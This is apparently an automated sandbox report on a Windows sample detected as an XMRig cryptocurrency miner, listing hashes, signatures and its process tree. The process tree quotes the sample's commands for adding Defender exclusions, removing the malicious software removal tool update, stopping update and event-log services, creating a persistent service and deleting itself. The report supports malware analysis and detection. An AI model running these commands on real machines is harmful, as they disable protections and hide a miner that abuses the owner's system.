Analysis
-
max time kernel
132s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 00:35
Static task
static1
Behavioral task
behavioral1
Sample
634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe
Resource
win7-20240221-en
General
-
Target
634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe
-
Size
5.3MB
-
MD5
634a71582674b11845ba99e2cdf75f80
-
SHA1
751ae63adc4cce6628a042a462d78b279f5a7a8e
-
SHA256
c9e86a8fc6bf55fb2a1666a8cd77752d367d1fdef4fa2ca032b362636c9512b0
-
SHA512
d76f3e2c475e6ba0e1efc7e2574e2dbb0d3430d2e91afea1cd3769a02bd608576bd2516589e5d6e594d966773675211ccfb5c2cf10770051318c346e337a5c65
-
SSDEEP
98304:RcmetZo1we5eNHA6Qtu1btqbyrvRdpveLhBRcIIIAEBczweizIPYj:9vwsKuoxqbyzRdpvuRcNIdBczjej
Malware Config
Signatures
-
XMRig Miner payload 8 IoCs
Processes:
resource yara_rule behavioral1/memory/2392-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2392-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2392-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2392-35-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2392-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2392-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2392-32-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2392-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 3024 powershell.exe 2796 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 628 cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
kjakmqdelduq.exepid process 472 2816 kjakmqdelduq.exe -
Loads dropped DLL 1 IoCs
Processes:
pid process 472 -
Processes:
resource yara_rule behavioral1/memory/2392-27-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-35-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2392-40-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exe634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exepowershell.exekjakmqdelduq.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe kjakmqdelduq.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
kjakmqdelduq.exedescription pid process target process PID 2816 set thread context of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 set thread context of 2392 2816 kjakmqdelduq.exe nslookup.exe -
Drops file in Windows directory 2 IoCs
Processes:
wusa.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2440 sc.exe 308 sc.exe 2448 sc.exe 2476 sc.exe 2584 sc.exe 1600 sc.exe 1956 sc.exe 2512 sc.exe 2556 sc.exe 2588 sc.exe 2672 sc.exe 2332 sc.exe 2412 sc.exe 812 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70bed43da9acda01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exepowershell.exekjakmqdelduq.exepowershell.exenslookup.exepid process 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 3024 powershell.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 1704 634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe 2816 kjakmqdelduq.exe 2796 powershell.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2816 kjakmqdelduq.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe 2392 nslookup.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 472 -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exenslookup.exedescription pid process Token: SeDebugPrivilege 3024 powershell.exe Token: SeShutdownPrivilege 2944 powercfg.exe Token: SeShutdownPrivilege 2920 powercfg.exe Token: SeShutdownPrivilege 2376 powercfg.exe Token: SeShutdownPrivilege 2472 powercfg.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeShutdownPrivilege 1040 powercfg.exe Token: SeShutdownPrivilege 1760 powercfg.exe Token: SeShutdownPrivilege 1036 powercfg.exe Token: SeShutdownPrivilege 2708 powercfg.exe Token: SeLockMemoryPrivilege 2392 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
cmd.execmd.execmd.exekjakmqdelduq.exedescription pid process target process PID 2676 wrote to memory of 2460 2676 cmd.exe wusa.exe PID 2676 wrote to memory of 2460 2676 cmd.exe wusa.exe PID 2676 wrote to memory of 2460 2676 cmd.exe wusa.exe PID 628 wrote to memory of 2800 628 cmd.exe choice.exe PID 628 wrote to memory of 2800 628 cmd.exe choice.exe PID 628 wrote to memory of 2800 628 cmd.exe choice.exe PID 1688 wrote to memory of 1296 1688 cmd.exe wusa.exe PID 1688 wrote to memory of 1296 1688 cmd.exe wusa.exe PID 1688 wrote to memory of 1296 1688 cmd.exe wusa.exe PID 2816 wrote to memory of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 wrote to memory of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 wrote to memory of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 wrote to memory of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 wrote to memory of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 wrote to memory of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 wrote to memory of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 wrote to memory of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 wrote to memory of 1516 2816 kjakmqdelduq.exe conhost.exe PID 2816 wrote to memory of 2392 2816 kjakmqdelduq.exe nslookup.exe PID 2816 wrote to memory of 2392 2816 kjakmqdelduq.exe nslookup.exe PID 2816 wrote to memory of 2392 2816 kjakmqdelduq.exe nslookup.exe PID 2816 wrote to memory of 2392 2816 kjakmqdelduq.exe nslookup.exe PID 2816 wrote to memory of 2392 2816 kjakmqdelduq.exe nslookup.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1704 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2460 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2556 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2584 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2448 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2588 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2440 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2944 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "ROADPDXD"2⤵
- Launches sc.exe
PID:2476 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "ROADPDXD" binpath= "C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe" start= "auto"2⤵
- Launches sc.exe
PID:1600 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:1956 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "ROADPDXD"2⤵
- Launches sc.exe
PID:308 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\634a71582674b11845ba99e2cdf75f80_NeikiAnalytics.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2800
-
C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exeC:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1296 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2672 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:812 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2332 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2412 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2512 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2708 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1036 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1516
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.3MB
MD5634a71582674b11845ba99e2cdf75f80
SHA1751ae63adc4cce6628a042a462d78b279f5a7a8e
SHA256c9e86a8fc6bf55fb2a1666a8cd77752d367d1fdef4fa2ca032b362636c9512b0
SHA512d76f3e2c475e6ba0e1efc7e2574e2dbb0d3430d2e91afea1cd3769a02bd608576bd2516589e5d6e594d966773675211ccfb5c2cf10770051318c346e337a5c65